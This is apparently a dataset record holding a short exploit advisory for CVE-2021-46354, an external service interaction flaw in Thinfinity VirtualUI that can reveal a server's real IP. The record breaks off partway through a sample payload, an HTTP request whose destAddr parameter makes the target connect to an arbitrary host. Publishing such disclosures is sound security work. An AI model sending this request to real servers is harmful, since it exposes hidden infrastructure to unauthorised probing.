+{"id": "ebdbd9f8c68ec1b950df", "text": "Thinfinity VirtualUI 2.5.26.2 - Information Disclosure\n\nExploit Title: Thinfinity VirtualUI 2.5.26.2 - Information Disclosure\nDate: 18/01/2022\nExploit Author: Daniel Morales\nVendor: https://www.cybelesoft.com \nSoftware Link: https://www.cybelesoft.com/thinfinity/virtualui/ \nVersion vulnerable: Thinfinity VirtualUI < v2.5.26.2\nTested on: Microsoft Windows\nCVE: CVE-2021-46354\n\nHow it works\nExternal service interaction arises when it is possible to induce an application to interact with an arbitrary external service. The ability to send requests to other systems can allow the vulnerable server to filtrate the real IP of the webserver or increase the attack surface (it may be used also to filtrate the real IP behind a CDN).\n\nPayload\nAn example of the HTTP request \"https://example.com/cmd ?\ncmd=connect&wscompression=true&destAddr=domain.com